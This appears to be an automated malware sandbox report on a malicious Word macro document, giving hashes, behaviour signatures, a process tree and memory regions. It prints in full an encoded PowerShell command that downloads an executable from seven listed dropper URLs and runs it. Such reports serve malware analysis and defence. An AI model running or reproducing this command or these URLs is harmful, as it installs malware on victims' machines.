Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-09-2024 18:06

General

  • Target

    ee258684b0fd453e48c84b57327b8225_JaffaCakes118.doc

  • Size

    160KB

  • MD5

    ee258684b0fd453e48c84b57327b8225

  • SHA1

    e3921f7d38b52ee18f289ef29057e1836cd9b504

  • SHA256

    02503f6546f32015f98eb839efb8b3d86d56b8ab5de5a30b5d6e99b4bd41802d

  • SHA512

    2a3b1f513eb8bb20158e508abec2b59055650a1373df2e78b3658340a144fc4813784eb8f8451af8142ba86a527af0404db95ad9152e2291965288c455090e79

  • SSDEEP

    1536:TB445TEgrO3jSWAg83tle1ZZ0293QM0eetR2cOupLB5UZ5F+a9wPzlnb3mSZ:T22TWTogk079THcpOu5UZ2P5b3mSZ

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://jobcapper.com/8.7.19/hrS/

exe.dropper

http://scoomie.com/wp-content/uploads/mxjsB/

exe.dropper

https://blog.workshots.net/bibqcr9/Eki/

exe.dropper

https://hxoptical.net/wp-admin/91C/

exe.dropper

https://adidasnmdfootlocker.com/nc_assets/F/

exe.dropper

http://socylmediapc.es/tools/D7Ogq/

exe.dropper

http://lombardzista.pl/wp-content/r/

Signatures

  • Blocklisted process makes network request 14 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee258684b0fd453e48c84b57327b8225_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2912
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHeLL.exe
      POWeRsHeLL -ENCOD JABFAGEAcAB5AHEAYQBkAD0AKAAoACcATgAnACsAJwBoAGsAbgAnACkAKwAnADcAZgAnACsAJwB1ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgB2ADoAdQBzAGUAcgBQAHIAbwBGAEkAbABFAFwAVgBkAHIAUQB0AGUAcABcAFEARAA2AHIATgBCADUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIAZQBDAFQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBSAEkAVAB5AHAAcgBvAHQAYABvAGMAbwBsACIAIAA9ACAAKAAnAHQAbAAnACsAJwBzACcAKwAoACcAMQAyACcAKwAnACwAJwApACsAKAAnACAAdABsACcAKwAnAHMAMQAxACwAJwApACsAKAAnACAAJwArACcAdABsAHMAJwApACkAOwAkAE0AawAzAHMANQBhADgAIAA9ACAAKAAoACcAQgBnAGQAJwArACcAegBjAGEAJwApACsAJwAzACcAKwAnADUAaAAnACkAOwAkAFkANAB1AHEAcgBxAHIAPQAoACcASAAnACsAKAAnADUAdwAnACsAJwBqAHUAJwApACsAJwA1AGEAJwApADsAJABZAHgAXwB2ADgAcAA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAMAAnACsAJwB9AFYAZAByAHEAdABlAHAAewAwAH0AUQBkACcAKwAoACcANgByAG4AYgAnACsAJwA1ACcAKQArACcAewAnACsAJwAwAH0AJwApAC0AZgBbAEMAaABBAFIAXQA5ADIAKQArACQATQBrADMAcwA1AGEAOAArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAFgAbQA1AGMAMQBzAHUAPQAoACcASwAnACsAKAAnAGcAMAAnACsAJwBlAHgAZwAnACkAKwAnAGoAJwApADsAJABHAHkAbABtAGsAcAB2AD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAJwArACcAdAAnACkAIABuAGUAdAAuAFcAZQBCAGMATABJAGUATgBUADsAJABPAHEAYQA0AHgAeQB4AD0AKAAnAGgAdAAnACsAKAAnAHQAcAA6AC8ALwAnACsAJwBqACcAKwAnAG8AYgBjACcAKQArACgAJwBhACcAKwAnAHAAJwArACcAcABlAHIALgBjAG8AbQAnACsAJwAvADgALgA3AC4AMQAnACkAKwAoACcAOQAvAGgAcgBTAC8AKgBoAHQAJwArACcAdABwADoAJwArACcALwAvAHMAYwAnACsAJwBvACcAKwAnAG8AbQBpACcAKwAnAGUALgAnACkAKwAnAGMAbwAnACsAKAAnAG0AJwArACcALwB3AHAAJwApACsAKAAnAC0AYwBvAG4AdAAnACsAJwBlAG4AdAAvACcAKwAnAHUAcABsACcAKQArACgAJwBvACcAKwAnAGEAZABzAC8AJwApACsAJwBtAHgAJwArACgAJwBqACcAKwAnAHMAQgAvACoAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwAnACsAJwA6ACcAKQArACcALwAvACcAKwAoACcAYgAnACsAJwBsAG8AZwAuAHcAbwByAGsAJwApACsAKAAnAHMAJwArACcAaABvAHQAcwAnACkAKwAnAC4AJwArACcAbgBlACcAKwAoACcAdAAvACcAKwAnAGIAJwArACcAaQBiAHEAYwAnACkAKwAnAHIAOQAnACsAJwAvACcAKwAnAEUAawAnACsAKAAnAGkAJwArACcALwAqACcAKQArACgAJwBoAHQAdABwACcAKwAnAHMAOgAvACcAKwAnAC8AaAAnACkAKwAnAHgAJwArACcAbwAnACsAKAAnAHAAdABpACcAKwAnAGMAJwApACsAKAAnAGEAbAAnACsAJwAuAG4AJwApACsAJwBlACcAKwAnAHQAJwArACgAJwAvAHcAJwArACcAcAAnACkAKwAoACcALQAnACsAJwBhAGQAbQAnACkAKwAnAGkAbgAnACsAKAAnAC8AOQAnACsAJwAxAEMALwAnACsAJwAqACcAKwAnAGgAdAB0AHAAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AYQBkACcAKwAnAGkAJwApACsAKAAnAGQAJwArACcAYQBzACcAKQArACgAJwBuAG0AZABmACcAKwAnAG8AJwApACsAKAAnAG8AdAAnACsAJwBsAG8AYwBrAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBuAGMAXwBhACcAKwAnAHMAcwAnACsAJwBlAHQAJwApACsAJwBzACcAKwAnAC8ARgAnACsAJwAvACoAJwArACcAaAAnACsAKAAnAHQAdABwADoALwAnACsAJwAvACcAKQArACcAcwBvACcAKwAnAGMAJwArACgAJwB5AGwAJwArACcAbQAnACkAKwAoACcAZQAnACsAJwBkAGkAYQAnACkAKwAnAHAAJwArACcAYwAuACcAKwAoACcAZQBzAC8AJwArACcAdABvACcAKwAnAG8AbABzAC8ARAA3ACcAKQArACgAJwBPAGcAJwArACcAcQAnACkAKwAoACcALwAqAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoAJwArACcALwAvAGwAJwApACsAKAAnAG8AbQBiAGEAJwArACcAcgBkAHoAJwArACcAaQBzAHQAYQAuACcAKQArACcAcABsACcAKwAnAC8AJwArACcAdwAnACsAKAAnAHAAJwArACcALQBjAG8AJwApACsAJwBuACcAKwAnAHQAJwArACgAJwBlAG4AJwArACcAdAAvAHIAJwApACsAJwAvACcAKQAuACIAUwBQAGwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAGMAYwBrAHYAZAAxAD0AKAAnAFgANAAnACsAKAAnADUAMgBtACcAKwAnADQAJwApACsAJwB4ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFoAMABnADkANAB1AHIAIABpAG4AIAAkAE8AcQBhADQAeAB5AHgAKQB7AHQAcgB5AHsAJABHAHkAbABtAGsAcAB2AC4AIgBEAE8AVwBgAE4AbABvAGEAZABgAEYASQBsAEUAIgAoACQAWgAwAGcAOQA0AHUAcgAsACAAJABZAHgAXwB2ADgAcAA4ACkAOwAkAFIAMQBkAHEAYQBlAHkAPQAoACcARwB4ACcAKwAoACcAYQBsAHMAbQAnACsAJwBxACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFkAeABfAHYAOABwADgAKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAyADIANwA2ADIAKQAgAHsALgAoACcASQBuAHYAbwBrAGUALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAoACQAWQB4AF8AdgA4AHAAOAApADsAJABBADQAcwAyADIAMwA1AD0AKAAnAFkAJwArACgAJwBnADkAeQA1ACcAKwAnAHUAeAAnACkAKQA7AGIAcgBlAGEAawA7ACQAUgBxADkAYwA0AHYAbQA9ACgAKAAnAFEAJwArACcAYQA5ACcAKQArACcAYwBwACcAKwAnAG4AdQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFMAZwBtAF8AZQB0ADkAPQAoACgAJwBIADYAYgAnACsAJwAwADEAJwApACsAJwAzAHAAJwApAA==
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2624

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      ec0c0e2746bccf0e9fc8c84f3e05274f

      SHA1

      ec3130b49728ff40b8364048883e665e398596e3

      SHA256

      cb5b56c130f74b3ce5e7f84407691a72d71e6d6a8277643b66403ae5c39bc4d9

      SHA512

      ee86823d62040e39ee614a454457b5cae5fd1e70ddc74ed37906049fdc8762b3e919bf358adbbbd5322569bc6f9037448316ab622156890f12f9f9199484373b

    • memory/2252-18-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-46-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-5-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-6-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-7-0x0000000005F60000-0x0000000006060000-memory.dmp

      Filesize

      1024KB

    • memory/2252-8-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-9-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-22-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-21-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-20-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-17-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-16-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-15-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-14-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-13-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-12-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-11-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-26-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-19-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-2-0x0000000070CFD000-0x0000000070D08000-memory.dmp

      Filesize

      44KB

    • memory/2252-10-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-27-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-25-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-31-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-32-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-30-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-29-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-28-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-24-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-23-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-33-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-72-0x0000000070CFD000-0x0000000070D08000-memory.dmp

      Filesize

      44KB

    • memory/2252-71-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2252-45-0x0000000070CFD000-0x0000000070D08000-memory.dmp

      Filesize

      44KB

    • memory/2252-0-0x000000002F311000-0x000000002F312000-memory.dmp

      Filesize

      4KB

    • memory/2252-47-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-48-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/2252-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2624-40-0x0000000001E70000-0x0000000001E78000-memory.dmp

      Filesize

      32KB

    • memory/2624-39-0x000000001B780000-0x000000001BA62000-memory.dmp

      Filesize

      2.9MB